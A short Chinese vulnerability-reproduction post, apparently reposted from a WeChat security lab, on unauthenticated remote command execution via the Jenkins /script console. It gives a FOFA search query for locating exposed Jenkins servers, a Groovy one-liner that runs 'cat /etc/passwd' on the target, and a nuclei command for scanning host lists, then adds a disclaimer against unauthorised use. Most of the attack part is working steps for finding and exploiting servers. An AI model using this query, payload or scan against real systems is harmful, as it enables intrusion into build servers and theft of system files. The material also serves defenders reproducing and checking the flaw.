0x01 漏洞描述
Jenkins是一个流行的开源持续集成和交付工具,它提供了一个可扩展的插件生态系统,可以用于自动化构建、测试和部署软件项目。Jenkins系统/script存在未授权远程命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
0x02 漏洞复现
fofa:app="Jenkins"
1.进入/script页面,执行cat /etc/passwd得到回显
/scriptprintln 'cat /etc/passwd'.execute().text
2.nuclei验证脚本已发表于知识星球
nuclei.exe -t jenkins-script-unauth-rce.yaml -l subs.txt -stats
(注:本文章为技术分享,禁止任何非授权攻击行为)
原文始发于微信公众号(融云攻防实验室):漏洞复现 Jenkins script 远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论